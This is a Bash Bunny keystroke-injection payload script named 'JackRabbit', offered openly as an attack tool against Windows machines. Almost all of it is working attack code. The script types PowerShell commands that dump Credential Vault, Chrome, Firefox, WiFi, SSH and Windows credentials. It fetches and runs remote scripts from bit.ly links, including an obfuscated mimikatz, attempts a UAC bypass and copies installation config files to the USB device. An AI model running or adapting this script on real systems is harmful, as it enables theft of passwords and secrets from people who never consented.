#!/bin/bash # # Title: JackRabbit # Author: illwill # Version: 0.1 # # Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a # Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName% # # Credits to these guys for their powershell scripts: # https://github.com/sekirkity/BrowserGather BrowserGather.ps1 # https://github.com/EmpireProject/Empire Get-FoxDump.ps1 # https://github.com/fireeye/SessionGopher SessionGopher .ps1 # https://github.com/gentilkiwi/mimikatz md.ps1 from gentilkiwi/clymb3r/mattifestation obfuscated to mimidogz #script # Purple...............Jackin dat loot # Green................Jacked dat loot # Red Blue.............PoPo caught yo ass LED R B 200 LOOTDIR=/root/udisk/loot/JackRabbit mkdir -p $LOOTDIR ATTACKMODE HID STORAGE LED B 200 # wait 6 seconds for the storage to popup Q DELAY 6000 Q GUI r Q DELAY 100 Q STRING POWERSHELL Q ENTER Q DELAY 500 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 100 # Make the loot folder of the computername Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\" Q ENTER Q DELAY 100 Q STRING md \$LOOTDIR2 Q ENTER Q DELAY 100 # Jackin' Credential Vault (I.E./Edge) Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\; Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \| Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt Q ENTER Q DELAY 100 # Jackin' Chrome Creds Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt Q ENTER Q DELAY 100 Q STRING exit Q ENTER # Open 32bit powershell and Jackin' Firefox Creds Q GUI r Q DELAY 100 Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Q ENTER Q DELAY 2000 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 100 Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\" Q ENTER Q DELAY 100 Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File \$LOOTDIR2\\FireFox.txt Q ENTER Q DELAY 100 Q STRING exit Q ENTER # UAC Bypass Q GUI r Q STRING powershell -c "Start-Process powershell -verb runas" Q ENTER Q DELAY 1500 Q LEFTARROW Q DELAY 500 Q ENTER Q DELAY 1000 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 100 Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\" Q ENTER Q DELAY 100 # Jackin' Windows creds Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nP5aQv\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt Q DELAY 300 Q ENTER # Jackin' Wifi creds Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \| Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \| Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt Q ENTER Q DELAY 100 # Jackin' SSH Creds # change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information. Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nrfTPI\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt Q ENTER Q DELAY 100 # Jackin' dem install configs Q STRING \$F \= @\(\)\;\$F \+\= \"C:\\sysprep.inf\"\;\$F \+\= \"C:\\sysprep\\sysprep.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattend\\Unattended.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattended.xml\"\; Q STRING \$i \= 0\; foreach\(\$file in \$F\) \{if \(Test-Path \$file\)\{cp \$file \$LOOTDIR2\;\$i\+\+\}\} Q ENTER Q DELAY 100 # Output DONE to root of USB file to let bashbunny we're all good in the hood Q DELAY 100 Q STRING Out-File -FilePath \$BUNNY\\loot\\DONE Q ENTER Q DELAY 100 # Eject the USB Safely Q STRING \$Eject \= New-Object -comObject Shell.Application Q ENTER Q DELAY 100 Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 1000 # GTFO Q STRING EXIT Q ENTER #Sync Drive sync FILE="/root/udisk/loot/DONE" while [ ! -e $FILE ]; do sleep 1; done; sleep 1; if [ -e $FILE ]; then rm -f $FILE; LED G 200 else LED R; for (( ; ; )) do LED R; sleep 1; LED B; sleep 1; done fi